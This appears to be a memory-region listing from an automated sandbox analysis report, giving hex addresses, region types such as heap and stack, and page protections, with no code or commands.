unkown
|
page readonly
|
||
209D9351000
|
heap
|
page read and write
|
||
205C8C2B000
|
heap
|
page read and write
|
||
1FAB36CC000
|
heap
|
page read and write
|
||
215AB2A0000
|
trusted library allocation
|
page read and write
|
||
230CA3F0000
|
heap
|
page read and write
|
||
215ABA19000
|
heap
|
page read and write
|
||
18B48B66000
|
heap
|
page read and write
|
||
1651FFDC000
|
heap
|
page read and write
|
||
1872244E000
|
heap
|
page read and write
|
||
231D6D1C000
|
heap
|
page read and write
|
||
231D6CF8000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
18B49065000
|
heap
|
page read and write
|
||
1AB93E00000
|
heap
|
page read and write
|
||
18B48C90000
|
direct allocation
|
page read and write
|
||
260C2E33000
|
trusted library allocation
|
page read and write
|
||
BF4B8FF000
|
unkown
|
page read and write
|
||
1872259C000
|
heap
|
page read and write
|
||
18B48A94000
|
heap
|
page read and write
|
||
1CBB6AE0000
|
heap
|
page read and write
|
||
215AB325000
|
heap
|
page read and write
|
||
18B49AB6000
|
heap
|
page read and write
|
||
2B2277BA000
|
heap
|
page read and write
|
||
10E3AE84000
|
heap
|
page read and write
|
||
7FFDA3433000
|
unkown
|
page execute and read and write
|
||
26207480000
|
heap
|
page read and write
|
||
18B4516C000
|
heap
|
page read and write
|
||
215AB35D000
|
heap
|
page read and write
|
||
1872200B000
|
heap
|
page read and write
|
||
260C1170000
|
heap
|
page read and write
|
||
7FFD93F5D000
|
unkown
|
page execute and read and write
|
||
17B1B330000
|
heap
|
page read and write
|
||
7FFD94469000
|
unkown
|
page execute and read and write
|
||
18B49A1E000
|
heap
|
page read and write
|
||
1C7B7423000
|
heap
|
page read and write
|
||
18B4514B000
|
heap
|
page read and write
|
||
1F78965C000
|
heap
|
page read and write
|
||
A13207E000
|
stack
|
page read and write
|
||
231D8BD5000
|
heap
|
page read and write
|
||
7FFDA3FDA000
|
unkown
|
page execute and write copy
|
||
215AB2E0000
|
heap
|
page read and write
|
||
1C7B92C6000
|
heap
|
page read and write
|
||
7FFD9DEB0000
|
unkown
|
page readonly
|
||
1091EA20000
|
heap
|
page read and write
|
||
24D95D71000
|
heap
|
page read and write
|
||
7FFDA3AF3000
|
unkown
|
page execute and read and write
|
||
18B49A07000
|
heap
|
page read and write
|
||
24D95C80000
|
heap
|
page read and write
|
||
18B4A4A1000
|
heap
|
page read and write
|
||
F8689FF000
|
unkown
|
page read and write
|
||
1C7B7428000
|
heap
|
page read and write
|
||
2B2277B9000
|
heap
|
page read and write
|
||
1FAB2F1B000
|
heap
|
page read and write
|
||
18B475C4000
|
heap
|
page read and write
|
||
218F19E0000
|
heap
|
page read and write
|
||
7FFD9402F000
|
unkown
|
page execute and read and write
|
||
18B49443000
|
heap
|
page read and write
|
||
1F78AEE0000
|
heap
|
page read and write
|
||
18387F64000
|
heap
|
page read and write
|
||
D6F51FF000
|
unkown
|
page read and write
|
||
1FAB36F1000
|
heap
|
page read and write
|
||
18B47ABB000
|
heap
|
page read and write
|
||
18387F79000
|
heap
|
page read and write
|
||
205C8BFB000
|
heap
|
page read and write
|
||
209D92E0000
|
heap
|
page read and write
|
||
18B4767D000
|
heap
|
page read and write
|
||
1C7B7428000
|
heap
|
page read and write
|
||
1FAB36DF000
|
heap
|
page read and write
|
||
18B4798E000
|
heap
|
page read and write
|
||
231D6D0C000
|
heap
|
page read and write
|
||
18387F35000
|
heap
|
page read and write
|
||
7FFDA54B0000
|
unkown
|
page readonly
|
||
18B49D53000
|
heap
|
page read and write
|
||
1FF03F9D000
|
heap
|
page read and write
|
||
18B47398000
|
heap
|
page read and write
|
||
2909FBEF000
|
heap
|
page read and write
|
||
18B4862A000
|
heap
|
page read and write
|
||
1CBB6AD8000
|
heap
|
page read and write
|
||
18B48992000
|
heap
|
page read and write
|
||
260C0B43000
|
trusted library allocation
|
page read and write
|
||
231D72F9000
|
heap
|
page read and write
|
||
FD2C97E000
|
stack
|
page read and write
|
||
7FFDA4161000
|
unkown
|
page execute and read and write
|
||
2302F100000
|
heap
|
page read and write
|
||
231D7155000
|
heap
|
page read and write
|
||
18387EE7000
|
heap
|
page read and write
|
||
1FAB4F6E000
|
heap
|
page read and write
|
||
18B47397000
|
heap
|
page read and write
|
||
18B46F70000
|
direct allocation
|
page read and write
|
||
215AB33A000
|
heap
|
page read and write
|
||
231D6D06000
|
heap
|
page read and write
|
||
255A2A70000
|
heap
|
page read and write
|
||
18387F36000
|
heap
|
page read and write
|
||
1F788F81000
|
heap
|
page read and write
|
||
7FFDA4DA9000
|
unkown
|
page execute and read and write
|
||
1651FFE5000
|
heap
|
page read and write
|
||
18722440000
|
heap
|
page read and write
|
||
D8771FF000
|
unkown
|
page read and write
|
||
1FAB3220000
|
heap
|
page read and write
|
||
7FFD33220000
|
trusted library allocation
|
page read and write
|
||
276C0AC7000
|
heap
|
page read and write
|
||
A1320FF000
|
stack
|
page read and write
|
||
18B49C0B000
|
heap
|
page read and write
|
||
18387EAE000
|
heap
|
page read and write
|
||
231D715B000
|
heap
|
page read and write
|
||
2909FD40000
|
heap
|
page read and write
|
||
18387E96000
|
heap
|
page read and write
|
||
18387E90000
|
heap
|
page read and write
|
||
7FFDA5476000
|
unkown
|
page read and write
|
||
1F788FAE000
|
heap
|
page read and write
|
||
18B488D8000
|
heap
|
page read and write
|
||
7FFD94466000
|
unkown
|
page execute and read and write
|
||
FD2C9FF000
|
stack
|
page read and write
|
||
215AB357000
|
heap
|
page read and write
|
||
18B47348000
|
heap
|
page read and write
|
||
7FFDA3AE0000
|
unkown
|
page readonly
|
||
19424ED0000
|
heap
|
page read and write
|
||
18B49D6E000
|
heap
|
page read and write
|
||
7FFD93C52000
|
unkown
|
page execute and read and write
|
||
18B48010000
|
direct allocation
|
page read and write
|
||
260BF230000
|
trusted library allocation
|
page read and write
|
||
1C7B73E8000
|
heap
|
page read and write
|
||
7FFDA3A93000
|
unkown
|
page read and write
|
||
1FF03EF0000
|
heap
|
page read and write
|
||
242DF837000
|
heap
|
page read and write
|
||
7FFD33050000
|
trusted library allocation
|
page execute and read and write
|
||
19350C84000
|
heap
|
page read and write
|
||
18B479BF000
|
heap
|
page read and write
|
||
2C49D130000
|
heap
|
page read and write
|
||
2797DB65000
|
heap
|
page read and write
|
||
18B48EE5000
|
heap
|
page read and write
|
||
FD2C6FE000
|
stack
|
page read and write
|
||
7FFDA3530000
|
unkown
|
page readonly
|
||
5F046FE000
|
stack
|
page read and write
|
||
18B47343000
|
heap
|
page read and write
|
||
1F78B0D0000
|
heap
|
page read and write
|
||
1FAB314E000
|
heap
|
page read and write
|
||
7FFDA3A8C000
|
unkown
|
page execute and read and write
|
||
18B47B95000
|
heap
|
page read and write
|
||
7FF7B2B9E000
|
unkown
|
page write copy
|
||
231D6D30000
|
heap
|
page read and write
|
||
1AB941E0000
|
heap
|
page read and write
|
||
16FD00E1000
|
heap
|
page read and write
|
||
7FFDA2EAA000
|
unkown
|
page read and write
|
||
C82DCD000
|
stack
|
page read and write
|
||
7FFD93BE7000
|
unkown
|
page execute and write copy
|
||
260BF283000
|
heap
|
page read and write
|
||
1872244A000
|
heap
|
page read and write
|
||
215AB352000
|
heap
|
page read and write
|
||
1C7B92D6000
|
heap
|
page read and write
|
||
7FFDA3458000
|
unkown
|
page execute and read and write
|
||
7FFD9E852000
|
unkown
|
page execute and read and write
|
||
1FAB4F62000
|
heap
|
page read and write
|
||
218F153A000
|
heap
|
page read and write
|
||
21D17ED000
|
stack
|
page read and write
|
||
18721FE6000
|
heap
|
page read and write
|
||
1F788F9F000
|
heap
|
page read and write
|
||
2797DB58000
|
heap
|
page read and write
|
||
18B4797A000
|
heap
|
page read and write
|
||
187225BC000
|
heap
|
page read and write
|
||
22048DC0000
|
heap
|
page read and write
|
||
18387E8B000
|
heap
|
page read and write
|
||
260C0F8D000
|
heap
|
page read and write
|
||
7FFDA33C1000
|
unkown
|
page execute and read and write
|
||
231D715A000
|
heap
|
page read and write
|
||
18B48AD7000
|
heap
|
page read and write
|
||
142E9ED5000
|
heap
|
page read and write
|
||
7FF7B2BA1000
|
unkown
|
page read and write
|
||
18B48752000
|
heap
|
page read and write
|
||
1C7B7A28000
|
heap
|
page read and write
|
||
1F78AEF4000
|
heap
|
page read and write
|
||
18387EA5000
|
heap
|
page read and write
|
||
1FAB4F74000
|
heap
|
page read and write
|
||
18B497BF000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
B3280FC000
|
stack
|
page read and write
|
||
F9F7E7F000
|
stack
|
page read and write
|
||
D3B347F000
|
stack
|
page read and write
|
||
18B47C0D000
|
heap
|
page read and write
|
||
18B4518B000
|
heap
|
page read and write
|
||
7FFD93B7F000
|
unkown
|
page execute and read and write
|
||
7FFD9DEE4000
|
unkown
|
page execute and write copy
|
||
DDD1E7E000
|
stack
|
page read and write
|
||
1F788FA3000
|
heap
|
page read and write
|
||
3F14EFC000
|
stack
|
page read and write
|
||
7FFDA54B9000
|
unkown
|
page execute and read and write
|
||
18B45171000
|
heap
|
page read and write
|
||
7FFDA0872000
|
unkown
|
page execute and read and write
|
||
18389DA6000
|
heap
|
page read and write
|
||
18B497D5000
|
heap
|
page read and write
|
||
2BD86700000
|
heap
|
page read and write
|
||
18B4A203000
|
heap
|
page read and write
|
||
187225BA000
|
heap
|
page read and write
|
||
2BD88020000
|
heap
|
page read and write
|
||
231D6DF4000
|
heap
|
page read and write
|
||
18B48260000
|
direct allocation
|
page read and write
|
||
1FAB3147000
|
heap
|
page read and write
|
||
7FFDA331D000
|
unkown
|
page execute and read and write
|
||
18722002000
|
heap
|
page read and write
|
||
18B47398000
|
heap
|
page read and write
|
||
5B3F7E000
|
stack
|
page read and write
|
||
79AA67F000
|
stack
|
page read and write
|
||
1F788F57000
|
heap
|
page read and write
|
||
1FAB2F12000
|
heap
|
page read and write
|
||
1FAB2E10000
|
heap
|
page read and write
|
||
18B4799B000
|
heap
|
page read and write
|
||
231D6D30000
|
heap
|
page read and write
|
||
A131CBB000
|
stack
|
page read and write
|
||
2BE10A3A000
|
heap
|
page read and write
|
||
1F789650000
|
heap
|
page read and write
|
||
231D6D23000
|
heap
|
page read and write
|
||
18723E3E000
|
heap
|
page read and write
|
||
215AD353000
|
heap
|
page read and write
|
||
7FFD93D1D000
|
unkown
|
page execute and read and write
|
||
18B4799C000
|
heap
|
page read and write
|
||
187225C5000
|
heap
|
page read and write
|
||
24373B00000
|
heap
|
page read and write
|
||
231D6D23000
|
heap
|
page read and write
|
||
7FFD330EA000
|
trusted library allocation
|
page read and write
|
||
1F788F75000
|
heap
|
page read and write
|
||
18B47366000
|
heap
|
page read and write
|
||
7FFD9E841000
|
unkown
|
page execute and read and write
|
||
1091EB87000
|
heap
|
page read and write
|
||
18721F00000
|
trusted library allocation
|
page read and write
|
||
1F788F86000
|
heap
|
page read and write
|
||
276C0D77000
|
heap
|
page read and write
|
||
1F789263000
|
heap
|
page read and write
|
||
17B1B111000
|
heap
|
page read and write
|
||
215AB320000
|
heap
|
page read and write
|
||
18B498CD000
|
heap
|
page read and write
|
||
18722599000
|
heap
|
page read and write
|
||
2F532595000
|
heap
|
page read and write
|
||
215AB331000
|
heap
|
page read and write
|
||
7FFD33016000
|
trusted library allocation
|
page execute and read and write
|
||
18387F27000
|
heap
|
page read and write
|
||
231D72F1000
|
heap
|
page read and write
|
||
209D92E4000
|
heap
|
page read and write
|
||
1CBB6AF1000
|
heap
|
page read and write
|
||
142E9F20000
|
heap
|
page read and write
|
||
255A2850000
|
heap
|
page read and write
|
||
7FFDA4342000
|
unkown
|
page execute and read and write
|
||
18B499B5000
|
heap
|
page read and write
|
||
18B4982B000
|
heap
|
page read and write
|
||
895A87D000
|
stack
|
page read and write
|
||
FD2CCFE000
|
stack
|
page read and write
|
||
1F789679000
|
heap
|
page read and write
|
||
215ABA19000
|
heap
|
page read and write
|
||
260D93F0000
|
heap
|
page read and write
|
||
28DDB820000
|
heap
|
page read and write
|
||
1F788F93000
|
heap
|
page read and write
|
||
18B4518C000
|
heap
|
page read and write
|
||
18B49018000
|
heap
|
page read and write
|
||
1F788F81000
|
heap
|
page read and write
|
||
21AB6CD4000
|
heap
|
page read and write
|
||
18B49D01000
|
heap
|
page read and write
|
||
1C7B7547000
|
heap
|
page read and write
|
||
7FFD93D10000
|
unkown
|
page readonly
|
||
22048DD0000
|
heap
|
page read and write
|
||
18721FE4000
|
heap
|
page read and write
|
||
1091EB72000
|
heap
|
page read and write
|
||
18721F00000
|
trusted library allocation
|
page read and write
|
||
243739C0000
|
heap
|
page read and write
|
||
18B4937F000
|
heap
|
page read and write
|
||
276C0C71000
|
heap
|
page read and write
|
||
1FAB2F26000
|
heap
|
page read and write
|
||
18B4866C000
|
heap
|
page read and write
|
||
18B476B5000
|
heap
|
page read and write
|
||
18B48A05000
|
heap
|
page read and write
|
||
2909FBC8000
|
heap
|
page read and write
|
||
1091EB9E000
|
heap
|
page read and write
|
||
18B49CF3000
|
heap
|
page read and write
|
||
260C28DB000
|
trusted library allocation
|
page read and write
|
||
260C2AE7000
|
trusted library allocation
|
page read and write
|
||
255A2970000
|
heap
|
page read and write
|
||
260BF2CA000
|
heap
|
page read and write
|
||
231D6D11000
|
heap
|
page read and write
|
||
2BE10B50000
|
heap
|
page read and write
|
||
1C7B7380000
|
trusted library allocation
|
page read and write
|
||
2302F104000
|
heap
|
page read and write
|
||
187225AE000
|
heap
|
page read and write
|
||
7FFD33200000
|
trusted library allocation
|
page read and write
|
||
18387F2B000
|
heap
|
page read and write
|
||
1FAB36E8000
|
heap
|
page read and write
|
||
7FFD33240000
|
trusted library allocation
|
page read and write
|
||
2909FBD9000
|
heap
|
page read and write
|
||
18388064000
|
heap
|
page read and write
|
||
18B48C7B000
|
heap
|
page read and write
|
||
18723E45000
|
heap
|
page read and write
|
||
1F788FA7000
|
heap
|
page read and write
|
||
1FAB2F07000
|
heap
|
page read and write
|
||
18B49B0A000
|
heap
|
page read and write
|
||
7FFDA3710000
|
unkown
|
page readonly
|
||
21AB6A59000
|
heap
|
page read and write
|
||
895A8FF000
|
stack
|
page read and write
|
||
18387F27000
|
heap
|
page read and write
|
||
7FFD33290000
|
trusted library allocation
|
page read and write
|
||
231D6CC8000
|
heap
|
page read and write
|
||
7FFDA2E91000
|
unkown
|
page execute and read and write
|
||
1FAB36DF000
|
heap
|
page read and write
|
||
1C7B7A06000
|
heap
|
page read and write
|
||
7FFDA3AFB000
|
unkown
|
page execute and write copy
|
||
7FFDA4175000
|
unkown
|
page execute and read and write
|
||
1C7B73C7000
|
heap
|
page read and write
|
||
18723E35000
|
heap
|
page read and write
|
||
2BE10A4A000
|
heap
|
page read and write
|
||
2BD86726000
|
heap
|
page read and write
|
||
2B227970000
|
heap
|
page read and write
|
||
7FFDA5460000
|
unkown
|
page readonly
|
||
18B475ED000
|
heap
|
page read and write
|
||
22125E50000
|
heap
|
page read and write
|
||
7FFD32F33000
|
trusted library allocation
|
page execute and read and write
|
||
DEA8EFE000
|
stack
|
page read and write
|
||
7FF7B2BA4000
|
unkown
|
page readonly
|
||
7FF7B2B60000
|
unkown
|
page readonly
|
||
18B493C0000
|
heap
|
page read and write
|
||
7FFD944E5000
|
unkown
|
page read and write
|
||
1872259F000
|
heap
|
page read and write
|
||
1FAB36D4000
|
heap
|
page read and write
|
||
27650D000
|
stack
|
page read and write
|
||
17B1B070000
|
heap
|
page read and write
|
||
18B45143000
|
heap
|
page read and write
|
||
7FFDA36CA000
|
unkown
|
page execute and read and write
|
||
18B4799B000
|
heap
|
page read and write
|
||
9D33EFF000
|
stack
|
page read and write
|
||
79AA39D000
|
stack
|
page read and write
|
||
2302ED00000
|
heap
|
page read and write
|
||
16FD00E1000
|
heap
|
page read and write
|
||
215AB352000
|
heap
|
page read and write
|
||
1F78AEF4000
|
heap
|
page read and write
|
||
187225AE000
|
heap
|
page read and write
|
||
1F788FB9000
|
heap
|
page read and write
|
||
18B49DF4000
|
heap
|
page read and write
|
||
1F788FBA000
|
heap
|
page read and write
|
||
FD2CD7E000
|
stack
|
page read and write
|
||
18B487FC000
|
heap
|
page read and write
|
||
18B47C9E000
|
heap
|
page read and write
|
||
2BD8672E000
|
heap
|
page read and write
|
||
18B49BFF000
|
heap
|
page read and write
|
||
7FFD331F0000
|
trusted library allocation
|
page read and write
|
||
18B4516E000
|
heap
|
page read and write
|
||
3C890FE000
|
stack
|
page read and write
|
||
230CA7A4000
|
heap
|
page read and write
|
||
2BE10930000
|
heap
|
page read and write
|
||
18B49B0A000
|
heap
|
page read and write
|
||
18B45190000
|
heap
|
page read and write
|
||
1FAB36E8000
|
heap
|
page read and write
|
||
18B472F7000
|
heap
|
page read and write
|
||
18B498FC000
|
heap
|
page read and write
|
||
7FFDA4345000
|
unkown
|
page execute and read and write
|
||
231D6D23000
|
heap
|
page read and write
|
||
18B4968F000
|
heap
|
page read and write
|
||
18B48B19000
|
heap
|
page read and write
|
||
18721FF5000
|
heap
|
page read and write
|
||
A131D3E000
|
stack
|
page read and write
|
||
260D1469000
|
trusted library allocation
|
page read and write
|
||
2BE10A10000
|
heap
|
page read and write
|
||
18387E50000
|
heap
|
page read and write
|
||
18B49BBE000
|
heap
|
page read and write
|
||
18B47B99000
|
heap
|
page read and write
|
||
18B4734B000
|
heap
|
page read and write
|
||
18B46A80000
|
unkown
|
page readonly
|
||
1C7B741C000
|
heap
|
page read and write
|
||
1FAB3234000
|
heap
|
page read and write
|
||
CAD2BCE000
|
stack
|
page read and write
|
||
18B49A17000
|
heap
|
page read and write
|
||
18722000000
|
heap
|
page read and write
|
||
231D715E000
|
heap
|
page read and write
|
||
7FFDA372F000
|
unkown
|
page execute and read and write
|
||
1C7B79FC000
|
heap
|
page read and write
|
||
18721FFC000
|
heap
|
page read and write
|
||
18B47312000
|
heap
|
page read and write
|
||
2797DB59000
|
heap
|
page read and write
|
||
18B475DD000
|
heap
|
page read and write
|
||
18B46A40000
|
heap
|
page read and write
|
||
215AB2A0000
|
trusted library allocation
|
page read and write
|
||
231D6D2B000
|
heap
|
page read and write
|
||
7FFDA3323000
|
unkown
|
page read and write
|
||
7FFD332C0000
|
trusted library allocation
|
page read and write
|
||
18722016000
|
heap
|
page read and write
|
||
1CBB6AC5000
|
heap
|
page read and write
|
||
2909FBED000
|
heap
|
page read and write
|
||
2F532270000
|
heap
|
page read and write
|
||
18B47B55000
|
heap
|
page read and write
|
||
1C7B73C9000
|
heap
|
page read and write
|
||
2B2277C2000
|
heap
|
page read and write
|
||
F9F7ADB000
|
stack
|
page read and write
|
||
7FFDA4639000
|
unkown
|
page read and write
|
||
18B47EF0000
|
direct allocation
|
page read and write
|
||
187225A1000
|
heap
|
page read and write
|
||
8BCD1FF000
|
stack
|
page read and write
|
||
18B48513000
|
heap
|
page read and write
|
||
24C59D50000
|
heap
|
page read and write
|
||
18B4517B000
|
heap
|
page read and write
|
||
1091EB00000
|
heap
|
page read and write
|
||
215ABA03000
|
heap
|
page read and write
|
||
218F14D8000
|
heap
|
page read and write
|
||
260D9630000
|
heap
|
page read and write
|
||
16FCFF40000
|
heap
|
page read and write
|
||
24C59B58000
|
heap
|
page read and write
|
||
15ABB820000
|
heap
|
page read and write
|
||
215AB2E8000
|
heap
|
page read and write
|
||
10E3AB98000
|
heap
|
page read and write
|
||
1FAB2F15000
|
heap
|
page read and write
|
||
142E9ED4000
|
heap
|
page read and write
|
||
1C7B7A1A000
|
heap
|
page read and write
|
||
215AB250000
|
heap
|
page read and write
|
||
1FAB2F22000
|
heap
|
page read and write
|
||
583D87F000
|
stack
|
page read and write
|
||
1C7B73CE000
|
heap
|
page read and write
|
||
18B479B8000
|
heap
|
page read and write
|
||
2909FBFC000
|
heap
|
page read and write
|
||
1F78965C000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
18B4894F000
|
heap
|
page read and write
|
||
18387F6E000
|
heap
|
page read and write
|
||
1FAB3140000
|
heap
|
page read and write
|
||
18B46EF8000
|
direct allocation
|
page read and write
|
||
1C7B73F0000
|
heap
|
page read and write
|
||
18B47BA0000
|
heap
|
page read and write
|
||
552FE7F000
|
stack
|
page read and write
|
||
18387F2F000
|
heap
|
page read and write
|
||
1F78965C000
|
heap
|
page read and write
|
||
260D92A0000
|
trusted library section
|
page read and write
|
||
2BD86730000
|
heap
|
page read and write
|
||
215AB331000
|
heap
|
page read and write
|
||
18387F79000
|
heap
|
page read and write
|
||
1F789673000
|
heap
|
page read and write
|
||
FD2C8FE000
|
stack
|
page read and write
|
||
1091EB63000
|
heap
|
page read and write
|
||
1FAB2F0E000
|
heap
|
page read and write
|
||
1F788F9D000
|
heap
|
page read and write
|
||
2C49D1A0000
|
heap
|
page read and write
|
||
1C7B73EF000
|
heap
|
page read and write
|
||
FC765CF000
|
stack
|
page read and write
|
||
19350C50000
|
heap
|
page read and write
|
||
260D1478000
|
trusted library allocation
|
page read and write
|
||
18B45171000
|
heap
|
page read and write
|
||
21AB6890000
|
heap
|
page read and write
|
||
7FFD32F34000
|
trusted library allocation
|
page read and write
|
||
1C7B73E3000
|
heap
|
page read and write
|
||
F9F7BDE000
|
stack
|
page read and write
|
||
232DEBC0000
|
heap
|
page read and write
|
||
231D8BC5000
|
heap
|
page read and write
|
||
231D6CF5000
|
heap
|
page read and write
|
||
17B1AF70000
|
heap
|
page read and write
|
||
2BD86726000
|
heap
|
page read and write
|
||
18B47A0A000
|
heap
|
page read and write
|
||
1FAB2EC9000
|
heap
|
page read and write
|
||
18387F7C000
|
heap
|
page read and write
|
||
1091EB89000
|
heap
|
page read and write
|
||
7FFD93461000
|
unkown
|
page execute and read and write
|
||
24D95D71000
|
heap
|
page read and write
|
||
1091EB48000
|
heap
|
page read and write
|
||
231D72F1000
|
heap
|
page read and write
|
||
18B49524000
|
heap
|
page read and write
|
||
18721FFF000
|
heap
|
page read and write
|
||
18B47AA2000
|
heap
|
page read and write
|
||
36230CC000
|
stack
|
page read and write
|
||
18387E59000
|
heap
|
page read and write
|
||
CAD27ED000
|
stack
|
page read and write
|
||
1F78926A000
|
heap
|
page read and write
|
||
7FFD93D75000
|
unkown
|
page execute and read and write
|
||
18B4734B000
|
heap
|
page read and write
|
||
18B488D8000
|
heap
|
page read and write
|
||
1FAB2EC4000
|
heap
|
page read and write
|
||
1C7B79F7000
|
heap
|
page read and write
|
||
1F788F52000
|
heap
|
page read and write
|
||
9AD2A7B000
|
stack
|
page read and write
|
||
18387EAF000
|
heap
|
page read and write
|
||
1F788FAE000
|
heap
|
page read and write
|
||
7FFDA36BB000
|
unkown
|
page execute and read and write
|
||
D6F50FC000
|
stack
|
page read and write
|
||
1F78966B000
|
heap
|
page read and write
|
||
215AB34F000
|
heap
|
page read and write
|
||
215AB352000
|
heap
|
page read and write
|
||
1C7B73F2000
|
heap
|
page read and write
|
||
1F788FA7000
|
heap
|
page read and write
|
||
FD2C673000
|
stack
|
page read and write
|
||
242DF770000
|
heap
|
page read and write
|
||
231D715A000
|
heap
|
page read and write
|
||
1102AFD000
|
stack
|
page read and write
|
||
18B48B5A000
|
heap
|
page read and write
|
||
18B451B2000
|
heap
|
page read and write
|
||
18B45190000
|
heap
|
page read and write
|
||
18B495C9000
|
heap
|
page read and write
|
||
18387EBB000
|
heap
|
page read and write
|
||
215AB322000
|
heap
|
page read and write
|
||
1F78AEF4000
|
heap
|
page read and write
|
||
18722597000
|
heap
|
page read and write
|
||
231D6D04000
|
heap
|
page read and write
|
||
1D25CC14000
|
heap
|
page read and write
|
||
24D95D71000
|
heap
|
page read and write
|
||
260C0B40000
|
trusted library allocation
|
page read and write
|
||
2797DB65000
|
heap
|
page read and write
|
||
BC083FF000
|
unkown
|
page read and write
|
||
7FFD33180000
|
trusted library allocation
|
page read and write
|
||
18387E90000
|
heap
|
page read and write
|
||
209D9351000
|
heap
|
page read and write
|
||
7FFD33170000
|
trusted library allocation
|
page read and write
|
||
7FF7B2BA4000
|
unkown
|
page readonly
|
||
5B3EFF000
|
stack
|
page read and write
|
||
18387F86000
|
heap
|
page read and write
|
||
18B4891B000
|
heap
|
page read and write
|
||
18B47A05000
|
heap
|
page read and write
|
||
7FFD9E858000
|
unkown
|
page read and write
|
||
18B47336000
|
heap
|
page read and write
|
||
18B47B36000
|
heap
|
page read and write
|
||
16FD00C0000
|
heap
|
page read and write
|
||
18B46B24000
|
heap
|
page read and write
|
||
1872200B000
|
heap
|
page read and write
|
||
7FFDA4DAE000
|
unkown
|
page execute and write copy
|
||
218F156C000
|
heap
|
page read and write
|
||
18B47C3D000
|
heap
|
page read and write
|
||
18B47B9E000
|
heap
|
page read and write
|
||
218F1A20000
|
heap
|
page read and write
|
||
1FAB2F22000
|
heap
|
page read and write
|
||
7FF7B2B9E000
|
unkown
|
page read and write
|
||
18B472D0000
|
heap
|
page read and write
|
||
1FAB323B000
|
heap
|
page read and write
|
||
2245C180000
|
heap
|
page read and write
|
||
231D715E000
|
heap
|
page read and write
|
||
18B4734B000
|
heap
|
page read and write
|
||
7FFDA4346000
|
unkown
|
page execute and write copy
|
||
215AD35F000
|
heap
|
page read and write
|
||
1C7B92CF000
|
heap
|
page read and write
|
||
231D7154000
|
heap
|
page read and write
|
||
260D926B000
|
heap
|
page read and write
|
||
18B48BC6000
|
heap
|
page read and write
|
||
18B488AB000
|
heap
|
page read and write
|
||
FD2CB78000
|
stack
|
page read and write
|
||
1FAB36EB000
|
heap
|
page read and write
|
||
1FAB36E9000
|
heap
|
page read and write
|
||
7FFDA3A80000
|
unkown
|
page readonly
|
||
22048D20000
|
heap
|
page read and write
|
||
18B49D6B000
|
heap
|
page read and write
|
||
231D6CC3000
|
heap
|
page read and write
|
||
260D9326000
|
heap
|
page read and write
|
||
1C7B740C000
|
heap
|
page read and write
|
||
18387EB2000
|
heap
|
page read and write
|
||
1872259F000
|
heap
|
page read and write
|
||
187225A8000
|
heap
|
page read and write
|
||
1FAB4F6E000
|
heap
|
page read and write
|
||
2797DE84000
|
heap
|
page read and write
|
||
18B49A1E000
|
heap
|
page read and write
|
||
FC7654C000
|
stack
|
page read and write
|
||
18B475B7000
|
heap
|
page read and write
|
||
3F150FF000
|
stack
|
page read and write
|
||
2909FBEE000
|
heap
|
page read and write
|
||
18B47BA0000
|
heap
|
page read and write
|
||
21AB6970000
|
heap
|
page read and write
|
||
230F89E0000
|
heap
|
page read and write
|
||
1F4C6DFA000
|
heap
|
page read and write
|
||
18B47A74000
|
heap
|
page read and write
|
||
18B497C8000
|
heap
|
page read and write
|
||
18B473AA000
|
heap
|
page read and write
|
||
18723E31000
|
heap
|
page read and write
|
||
1C7B73A7000
|
heap
|
page read and write
|
||
205C8C1D000
|
heap
|
page read and write
|
||
7FFD93DA0000
|
unkown
|
page execute and read and write
|
||
2239CB0D000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
1F789647000
|
heap
|
page read and write
|
||
2BE10A52000
|
heap
|
page read and write
|
||
BF4B5DB000
|
stack
|
page read and write
|
||
1F788F81000
|
heap
|
page read and write
|
||
255A2B74000
|
heap
|
page read and write
|
||
7FF7B2B9E000
|
unkown
|
page write copy
|
||
1F789668000
|
heap
|
page read and write
|
||
18723E3E000
|
heap
|
page read and write
|
||
7FFD93D89000
|
unkown
|
page execute and read and write
|
||
231D6CF5000
|
heap
|
page read and write
|
||
218F154C000
|
heap
|
page read and write
|
||
1FAB314A000
|
heap
|
page read and write
|
||
7FFD32F32000
|
trusted library allocation
|
page read and write
|
||
18B48EE2000
|
heap
|
page read and write
|
||
2245C18A000
|
heap
|
page read and write
|
||
1C7B7A08000
|
heap
|
page read and write
|
||
133E10A0000
|
heap
|
page read and write
|
||
18B482AC000
|
direct allocation
|
page read and write
|
||
215AB694000
|
heap
|
page read and write
|
||
18B450FD000
|
heap
|
page read and write
|
||
18B4964D000
|
heap
|
page read and write
|
||
142E9F43000
|
heap
|
page read and write
|
||
2797DB07000
|
heap
|
page read and write
|
||
7FFD32F40000
|
trusted library allocation
|
page read and write
|
||
18B4516E000
|
heap
|
page read and write
|
||
215ABA08000
|
heap
|
page read and write
|
||
19350C30000
|
heap
|
page read and write
|
||
B93F6FF000
|
stack
|
page read and write
|
||
A131DBE000
|
stack
|
page read and write
|
||
18B45143000
|
heap
|
page read and write
|
||
7FFDA5499000
|
unkown
|
page execute and read and write
|
||
7FFD93D04000
|
unkown
|
page execute and read and write
|
||
2C49D030000
|
heap
|
page read and write
|
||
21AB6CD0000
|
heap
|
page read and write
|
||
18B49D13000
|
heap
|
page read and write
|
||
FD2CAF7000
|
stack
|
page read and write
|
||
52AA1FF000
|
stack
|
page read and write
|
||
36DF96F000
|
stack
|
page read and write
|
||
16FD00D9000
|
heap
|
page read and write
|
There are 2590 hidden memdumps, click here to show them.